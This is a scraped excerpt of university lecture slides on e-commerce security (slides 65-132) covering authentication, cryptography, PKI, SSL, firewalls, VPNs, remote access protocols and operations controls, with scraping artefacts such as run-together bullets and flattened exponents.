Security Controls (cont.)
Ref: . Harris, CISSP All-in-One Exam Guide, 3rd Edition, McGraw-Hill
![Page 65: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/65.jpg)
ITEC5611
S. Kungpisdan65
Authentication
• Something you know– Passwords, pins
• Something you have– Tokens, smart cards
• Something you are– biometrics
![Page 66: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/66.jpg)
ITEC5611
S. Kungpisdan66
Biometrics
biometric systemsAuthentication systems that identify a person by measurement of a biological characteristic, such as fingerprints, iris (eye) patterns, facial features, or voice
physiological biometricsMeasurements derived directly from different parts of the body (e.g., fingerprint, iris, hand, facial characteristics)
behavioral biometricsMeasurements derived from various actions and indirectly from various body parts (e.g., voice scans or keystroke monitoring)
![Page 67: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/67.jpg)
ITEC5611
S. Kungpisdan67
Biometrics (cont.)
• Fingerprints• Palm Scans• Hand Geometry• Retina Scans• Iris Scans• Facial Scans• Voice Print• Signature Dynamics• Keyboard Dynamics
![Page 68: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/68.jpg)
ITEC5611
S. Kungpisdan68
Single Sign-on
• Kerberos• Allow a user to access many services from only
one authentication• Symmetric key encryption
– KDC – Kerberos-trusted Key Distribution Center– AS – Authentication Server– TGS – Ticket Granting Service
![Page 69: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/69.jpg)
ITEC5611
S. Kungpisdan69
Kerberos (cont.)
Ref: W. Stallings, Cryptography and Network Security, 4 th Edition, Pearson-PrenticeHall
![Page 70: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/70.jpg)
ITEC5611
S. Kungpisdan70
Intrusion Detection
• Network Based– Real Time, Passive– Snort
• Host Based – System and event logs– Limited by log capabilities
• Honey Pot• System Integrity Verifier (SIV)
– Tripwire
![Page 71: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/71.jpg)
ITEC5611
S. Kungpisdan71
Intrusion Detection (cont.)
• Signature Based – (Knowledge Based)– Signatures of an attack are stored and referenced
– Failure to recognize slow attacks
– Must have signature stored to identify
• Statistical Anomaly Based (Behavior Based)– IDS determines “normal” usage profile using statistical samples
– Detects anomaly from the normal profile
![Page 72: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/72.jpg)
ITEC5611
S. Kungpisdan72
Measures for compensating for both internal and external access violations
• Backups• RAID – Redundant Array of Inexpensive Disks• Fault Tolerance• Business Continuity Planning• Insurance
![Page 73: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/73.jpg)
ITEC5611
S. Kungpisdan73
Outline
• EC Architectural Framework• EC Security
– Basic Security Issues– Security Incidences– Attacking Web Applications– Access Controls– Securing EC Communications– Securing EC Networks– Operations Security– Law, Investigation, and Ethics
![Page 74: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/74.jpg)
Transaction Security Issues
• Disclosure:– Release of message contents to any person not authorized to
see them • Traffic Analysis:
– It refers to the discovery of the pattern of traffic between parties.• Masquerade:
– It refers to insertion of messages into the network from a fraudulent source.
• Content modification: – Changes to the contents of a message, including insertion,
deletion, transposition, or modification.
ITEC5611
S. Kungpisdan74
![Page 75: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/75.jpg)
Transaction Security Issues (cont.)
• Sequence modification: – It refers insertion, deletion, and reordering of some sequenced
packets by the intruder during transmission.• Timing modification:
– It refers to delayed or replay of old message sequences that were recorded by intruder in an earlier transaction.
• Repudiation: – It refers to the denial of receipt of message by destination or
denial of transmission of message by source.
ITEC5611
S. Kungpisdan75
![Page 76: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/76.jpg)
ITEC5611
S. Kungpisdan76
Encryption
The process of scrambling (encrypting) a message (plaintext) into ciphertext in such a way that it is difficult, expensive, or time-consuming for an unauthorized person to unscramble (decrypt) it
plaintext + encryption algorithm + key ciphertext
![Page 77: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/77.jpg)
ITEC5611
S. Kungpisdan77
Basic Terminology
• plaintext - original message • ciphertext - coded message • cipher - algorithm for transforming plaintext to ciphertext • key - info used in cipher known only to sender/receiver • encipher (encrypt) - converting plaintext to ciphertext • decipher (decrypt) - recovering ciphertext from plaintext• cryptography - study of encryption principles/methods• cryptanalysis (codebreaking) - study of principles/
methods of deciphering ciphertext without knowing key• cryptology - field of both cryptography and cryptanalysis
![Page 78: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/78.jpg)
ITEC5611
S. Kungpisdan78
![Page 79: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/79.jpg)
ITEC5611
S. Kungpisdan79
Cryptography and Steganography
• Plaintext can be hidden by two ways:– Steganography: conceal the existence of the
message– Cryptography: render the message unintelligible to
outsiders using various kinds of transformation of the text
• Examples of Steganography– Character marking: overwrite text with pencil– Invisible ink: use special substance– Pin punctures: pin puncture on selected letters
![Page 80: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/80.jpg)
ITEC5611
S. Kungpisdan80
How a Cryptosystem Works
Plaintext (M) (data file or messages)
encryption algorithm (E) + secret key A (KA)
Ciphertext (C) (stored or transmitted safely)
decryption algorithm (D) + secret key B (KB)
Plaintext (M) (original data or messages)
Note: Key A may be the same as Key B, depending on the algorithm
E(M) = CD(C) = MD(E(M)) = M
![Page 81: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/81.jpg)
ITEC5611
S. Kungpisdan81
Brute Force Search
• always possible to simply try every key • most basic attack, proportional to key size • assume either know / recognise plaintext
Key Size (bits) Number of Alternative Keys
Time required at 1 decryption/µs
Time required at 106 decryptions/µs
32 232 = 4.3 109 231 µs = 35.8 minutes 2.15 milliseconds
56 256 = 7.2 1016 255 µs = 1142 years 10.01 hours
128 2128 = 3.4 1038 2127 µs = 5.4 1024 years 5.4 1018 years
168 2168 = 3.7 1050 2167 µs = 5.9 1036 years 5.9 1030 years
26 characters (permutation)
26! = 4 1026 2 1026 µs = 6.4 1012 years 6.4 106 years
![Page 82: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/82.jpg)
ITEC5611
S. Kungpisdan82
Caesar Cipher
• earliest known substitution cipher• by Julius Caesar • first attested use in military affairs• replaces each letter by 3rd letter on• example:
meet me after the toga partyPHHW PH DIWHU WKH WRJD SDUWB
![Page 83: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/83.jpg)
ITEC5611
S. Kungpisdan83
K=3
Inner: ciphertextOuter: plaintext
Caesar Cipher
![Page 84: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/84.jpg)
ITEC5611
S. Kungpisdan84
Cryptanalysis of Caesar Cipher
• only have 26 possible ciphers – A maps to A,B,..Z
• could simply try each in turn • a brute force search • given ciphertext, just try all shifts of letters• do need to recognize when have plaintext• eg. break ciphertext "GCUA VQ DTGCM"
![Page 85: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/85.jpg)
ITEC5611
S. Kungpisdan85
Types of Cryptography
• Symmetric Cryptography– Deploy the same secret key to encrypt and decrypt
messages– The secret key is shared between two parties– Encryption algorithm is the same as decryption
algorithm
• Asymmetric (Public-key) Cryptography– Private key, Public key– The secret key is not shared and two parties can
still communicate using their public keys– Encryption alg. is different from decryption alg.
![Page 86: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/86.jpg)
ITEC5611
S. Kungpisdan86
Symmetric Cryptography
Ref: W. Stallings, Cryptography and Network Security, 4 th Edition, Pearson-PrenticeHall
![Page 87: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/87.jpg)
ITEC5611
S. Kungpisdan87
Public-Key Cryptography
Ref: W. Stallings, Cryptography and Network Security, 4 th Edition, Pearson-PrenticeHall
![Page 88: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/88.jpg)
ITEC5611
S. Kungpisdan88
Data Encryption Standard (DES)
• Derived in 1972 as derivation of Lucifer algorithm developed by Horst Fiestel at IBM
• Commercial and non-classified systems• DES uses 64 bit block size and 56 bit key, begins with
64 bit key and strips 8 parity bits• DEA is 16 round cryptosystem designed for
implementation in hardware• 56 bit key = 256 or 70 quadrillion possible keys• Distributed systems can break it. U.S. Government no
longer uses it• Triple DES – three encryptions using DEA are now being
used until AES is adopted
![Page 89: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/89.jpg)
ITEC5611
S. Kungpisdan89
3DES
• Double encryption is subject to meet in the middle attack
• Encrypt on one end decrypt on the other and compare the values
• So Triple DES is used• Can be done several different ways:
– DES – EDE2 (encrypt key 1, decrypt key 2, encrypt key 1)
– DES – EE2 (encrypt key 1, encrypt key 2, encrypt key 1)
– DES –EE3 (encrypt key 1, encrypt key 2, encrypt key 3) - most secure
![Page 90: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/90.jpg)
ITEC5611
S. Kungpisdan90
AES
• Advanced Encryption Standard• Block Cipher that will replace DES• Anticipated that Triple DES will remain approved for
Government Use• AES announced by NIST in January 1997 to find
replacement for DES
• October 2, 2000 NIST Selected Rijndael• 2 Belgian Cryptographers Dr. Daeman and Dr. Rijmen• Will be used by government for sensitive but unclassified
documents
![Page 91: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/91.jpg)
ITEC5611
S. Kungpisdan91
RSA
• Rivest, Shamir and Addleman• Based on difficulty of factoring a number which
is the product of two large prime numbers, may be 200 digits each.
• Can be used for Encryption, key exchange, and digital signatures
![Page 92: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/92.jpg)
ITEC5611
S. Kungpisdan92
Elliptic Curve Cryptography (ECC)
• Elliptic curve discrete logarithm are hard to compute than general discrete logarithm
• Smaller key size same level of security• Elliptic curve key of 160 bits = RSA of 1024 bits• Suited to smart cards and wireless devices (less
memory and processing)• Digital signatures, encryption and key
management
![Page 93: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/93.jpg)
ITEC5611
S. Kungpisdan93
Digital Signal Standard (DSS) and Secure Hash Standard (SHS)
• Enables use of RSA digital signature algorithm or DSA –Digital Signature Algorithm (based on El Gamal)
• Both use The Secure Hash Algorithm to compute message digest then processed by DSA to verify the signature. Message digest is used instead of the longer message because faster.
![Page 94: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/94.jpg)
ITEC5611
S. Kungpisdan94
MD5 and SHA-1
• MD5 Message Digest version 5– Developed by Ronald Rivest in 1991– Produces 128 bit message digest
• SHA-1– Secure Hash Algorithm produces 160 bit digest if
message is less than 2^64 bits.– It is computationally infeasible to find message from
message digest– It is computationally infeasible to find to different
messages with same message digest – Padding bits are added to message to make it a
multiple of 512
![Page 95: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/95.jpg)
ITEC5611
S. Kungpisdan95
Digital Signatures
![Page 96: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/96.jpg)
ITEC5611
S. Kungpisdan96
Public Key Certification Systems
• A source could post a public key under the name of another individual
• Digital certificates counter this attack, a certificate can bind individuals to their key
• A Certificate Authority (CA) acts as a notary to bind the key to the person
• CA must be cross-certified by another CA
![Page 97: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/97.jpg)
ITEC5611
S. Kungpisdan97
Public Key Infrastructure
• Digital Certificates• Certificate Authorities (CA)• Registrations Authorities• Policies and procedures• Certificate Revocation• Non-repudiation support• Timestamping• Lightweight Directory Access Protocol• Security Enabled Applications• Cross Certification
![Page 98: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/98.jpg)
ITEC5611
S. Kungpisdan98
Key Escrow
• Allowing law enforcement to obtain the keys to view peoples encrypted data
• Escrow the key in two pieces with two trusted escrow agents
• Court order to get both pieces• Clipper Chip – implemented in tamper proof
hardware
![Page 99: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/99.jpg)
ITEC5611
S. Kungpisdan99
Key Management
• Key control• Key recovery• Key storage• Key retirement/destruction• Key Change• Key Generation• Key theft• Frequency of key use
![Page 100: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/100.jpg)
ITEC5611
S. Kungpisdan100
E-mail Security
• Non-repudiation
• Confidentiality of messages
• Authentication of Source
• Verification of delivery
![Page 101: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/101.jpg)
ITEC5611
S. Kungpisdan101
Secure Multipurpose Internet Mail Extensions (S/MIME)
• Adds secure services to messages in MIME format
• Provides authentication through digital signatures
• Follows Public Key Cryptography Standards (PKCS)
• Uses X.509 Signatures
![Page 102: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/102.jpg)
ITEC5611
S. Kungpisdan102
Pretty Good Privacy - PGP
• Phil Zimmerman• Symmetric Cipher using IDEA• RSA is used for signatures and key distribution• No CA, uses “web of trust”• Users can certify each other
![Page 103: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/103.jpg)
ITEC5611
S. Kungpisdan103
Secure Sockets Layer (SSL)
• Developed by Netscape in 1994• Uses public key to authenticate server to the client• Also provides option client to sever authentication• Supports RSA public Key Algorithms, IDEA, DES, and
3DES• Supports MD5 Hashing• HTTPS header• Resides between the application and TCP layer• Can be used by telnet, FTP, HTTP and e-mail protocols.• Based on X.509• Transaction Layer Security Successor to SSL
![Page 104: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/104.jpg)
ITEC5611
S. Kungpisdan104
Outline
• EC Architectural Framework• EC Security
– Basic Security Issues– Security Incidences– Attacking Web Applications– Access Controls– Securing EC Communications– Securing EC Networks– Operations Security– Law, Investigation, and Ethics
![Page 105: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/105.jpg)
ITEC5611
S. Kungpisdan105
OSI Security Services
• A security service is a collection of security mechanisms, files, and procedures that help protect the network.– Authentication– Access control– Data confidentiality– Data integrity– Non-repudiation– Logging and monitoring
![Page 106: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/106.jpg)
ITEC5611
S. Kungpisdan106
OSI Security Mechanisms
• A security mechanism is a control that is implemented in order to provide the 6 basic security services.– Encipherment (encryption and decryption)– Digital signature– Access Control– Data Integrity– Authentication– Traffic Padding– Routing Control– Notarization
![Page 107: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/107.jpg)
ITEC5611
S. Kungpisdan107
Application Layer Security
• SET – Secure Electronic Transaction– Originated by Visa and MasterCard– Being overtaken by SSL
• HTTPS - Secure HTTP– Early standard for encrypting HTTP messages– Also being overtaken by SSL
• S/MIME – Secure Multi-purposed Internet Mail Extension– Email encryption and digital signature
![Page 108: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/108.jpg)
ITEC5611
S. Kungpisdan108
Transport Layer Security
• SSH-2 – Secure Shell version 2– SSH has RSA Certificates– Supports authentication, compression, confidentiality, and
integrity– DES Encryption– Because Secure Shell (SSH-2) supports authentication,
compression, confidentiality, and integrity, SSH is used frequently for Encrypted File Transfer
• SSL – Secure Socket Layer– Contains SSL record protocol and SSL Handshake Protocol– Uses symmetric encryption and public key for authentication– MAC – Message Authentication Code for Integrity
![Page 109: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/109.jpg)
ITEC5611
S. Kungpisdan109
Firewalls
• Packet Filtering Firewall - First Generation– Screening Router– Operates at Network and Transport level– Examines Source and Destination IP Address– Can deny based on ACLs– Can specify Port
• Application Level Firewall - Second Generation– Proxy Server– Copies each packet from one network to the other– Masks the origin of the data– Operates at layer 7 (Application Layer)– Reduces Network performance since it has do analyze each
packet and decide what to do with it.– Also Called Application Layer Gateway
![Page 110: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/110.jpg)
ITEC5611
S. Kungpisdan110
Firewalls (cont.)
• Stateful Inspection Firewalls – Third Generation– Packets Analyzed at all OSI layers– Queued at the network level– Faster than Application level Gateway
• Dynamic Packet Filtering Firewalls – Fourth Generation– Allows modification of security rules– Mostly used for UDP– Remembers all of the UDP packets that have crossed the
network’s perimeter, and it decides whether to enable packets to pass through the firewall.
• Kernel Proxy – Fifth Generation– Runs in NT Kernel– Uses dynamic and custom TCP/IP-based stacks to inspect the
network packets and to enforce security policies.
![Page 111: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/111.jpg)
ITEC5611
S. Kungpisdan111
Demilitarized Zone (DMZ)
![Page 112: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/112.jpg)
ITEC5611
S. Kungpisdan112
Virtual Private Networks
• PPTP – Point-to-Point Tunneling Protocol– Works at the Data Link Layer– Single point to point connection from client to server– Common with asynchronous connections with NT and Win 95
• L2TP - Layer 2 Tunneling Protocol– Combination of PPTP and earlier Layer 2 Forwarding Protocol (L2F)– Multiple protocols can be encapsulated within the L2TP– Single point to point connection from client to server– Common with Dial-up VPNs
• IPSec– Operates at the network layer– Allows multiple and simultaneous tunnels– Encrypt and authenticate IP data– Focuses more on Network to Network Connectivity
![Page 113: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/113.jpg)
ITEC5611
S. Kungpisdan113
Wireless Security
• WEP – Wired Equivalency Privacy – up to 128-bit WEP
• WPA (Wireless Protected Access) is more secure, recently WPA2
• WAP - Wireless Access Point• SSID – Service Set Identifier – Network Name
– Disable SSID broadcast
• Use encryption, VPN, treat as external connection, directional antenna
![Page 114: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/114.jpg)
ITEC5611
S. Kungpisdan114
Remote Node Security Protocols
• Password Authentication Protocol (PAP)– Remote security protocol. Provides Identification and
Authentication.– Uses static replayable password for authentication (now
considered weak)– Does not encrypt the User ID or Password
• Challenge Handshake Protocol (CHAP)– Next evolution of PAP uses stronger authentication– Nonreplayable Challenge/Response– Verifies Identity of the node– Often used to enable network-to-network communication– Commonly used by remote access servers and xDSL, ISDN,
and cable modems
![Page 115: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/115.jpg)
ITEC5611
S. Kungpisdan115
Remote Access Authentication System
• TACACS – Terminal Access Controller Access Control System (TCP)
• TACACS+ – includes the use of two factor authentication
• RADIUS – Remote Access Dial-In User Service (UDP)
![Page 116: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/116.jpg)
ITEC5611
S. Kungpisdan116
TACACS
• Terminal Access Controller Access Control System • Provides remote authentication and related services• User password administered in a central database rather
than in individual routers• TACACS enabled network device prompts for user name
and static password• TACACS enabled network device queries TACACA
server to verify password• Does not support prompting for password change or use
of dynamic tokens
![Page 117: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/117.jpg)
ITEC5611
S. Kungpisdan117
TACACS+
• Terminal Access Controller Access Control System Plus
• Proprietary CISCO enhancement• Two factor Authentication• User can change password• Ability to use secure tokens• Better Audit Trails
![Page 118: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/118.jpg)
ITEC5611
S. Kungpisdan118
RADIUS
• Remote Access Dial-In User Service • Offers similar benefits to TACACS+• Often used as a stepping stone to TACACS+• Radius Server contains dynamic password and network
service access information (Network ACLS)• Radius is a fully open protocol, can be customized for
almost any security system• Can be used with Kerberos and provides CHAP remote
node authentication• Except does not work with:
– Apple Talk Remote Access Resolution Protocol– NetBios Frame Protocol Control Protocol– Netware Asynchronous Services Interface– X.25 PAD Connection
![Page 119: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/119.jpg)
ITEC5611
S. Kungpisdan119
Honeypots
• Production systems (e.g., firewalls, routers, Web servers, database servers) designed to do real work but that are watched and studied as network intrusions occur
![Page 120: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/120.jpg)
ITEC5611
S. Kungpisdan120
Layered Security
![Page 121: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/121.jpg)
ITEC5611
S. Kungpisdan121
Outline
• EC Architectural Framework• EC Security
– Basic Security Issues– Security Incidences– Attacking Web Applications– Access Controls– Securing EC Communications– Securing EC Networks– Operations Security– Law, Investigation, and Ethics
![Page 122: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/122.jpg)
ITEC5611
S. Kungpisdan122
Asset, Vulnerability, Threat
• Asset – anything that is a computer resource (i.e. software data)
• Vulnerability – weakness in a system that enables security to be violated (i.e. Weak Segregation of duties)
• Threat – an event that could cause harm by violating the security ( i.e. Operator abuse of privileges)
![Page 123: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/123.jpg)
ITEC5611
S. Kungpisdan123
CIA
• Confidentiality – operations controls affect confidentiality of data.
• Integrity – how well operations controls are implemented affects data integrity
• Availability – fault tolerance and ability to recover
![Page 124: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/124.jpg)
ITEC5611
S. Kungpisdan124
Controls and Protections
• Controls to protect hardware, software and media from:– Threats in an operating environment– Internal and external intruders– Operators inappropriately accessing
resources
![Page 125: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/125.jpg)
ITEC5611
S. Kungpisdan125
Categories of Controls
• Preventative – prevent harmful occurrence– Lower amount and impact of errors entering the
system– Prevent unauthorized intruders from accessing the
system
• Detective – detect after harmful occurrence– Track unauthorized transactions
• Corrective – restore after harmful occurrence– Data recovery
![Page 126: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/126.jpg)
ITEC5611
S. Kungpisdan126
Separation of Duties
• Assign different tasks to different personnel• No single person can completely compromise a system• Related to the concept of least privileges – least
privileges required to do one’s job• Secure Systems - System Administrator and Security
Administrator must be different roles.• Highly Secure Systems - System Administrator, Security
Administrator, and Enhanced Operator must be different roles.
![Page 127: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/127.jpg)
ITEC5611
S. Kungpisdan127
System Administrator Functions
• Installing software• Start up and shut down of system• Adding removing users• Performing back up and recovery• Handling printers and queues
![Page 128: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/128.jpg)
ITEC5611
S. Kungpisdan128
Security Administrator Functions
• Setting user clearances, initial passwords and other security characteristics for new users
• Changing security profiles for users• Setting file sensitivity labels• Setting security of devices• Renewing audit data
![Page 129: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/129.jpg)
ITEC5611
S. Kungpisdan129
Least Privilege
• No access beyond job requirements
• Group level privileges for Operators– Read Only– Read /Write - usually copies of original data– Access Change – make changes to original
data
![Page 130: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/130.jpg)
ITEC5611
S. Kungpisdan130
Operation Controls
• Resource Protection
• Hardware Controls
• Software Controls
![Page 131: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/131.jpg)
ITEC5611
S. Kungpisdan131
Resource Protection
• Protecting Resources from disclosure alteration or misuse– Hardware – routers, firewalls, computers,
printers– Software – libraries, vendor software, OS
software– Data Resource – backup data, user data, logs
![Page 132: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.](https://reader035.fdocuments.net/reader035/viewer/2022062222/56649e355503460f94b24672/html5/thumbnails/132.jpg)
ITEC5611
S. Kungpisdan132
Hardware Controls
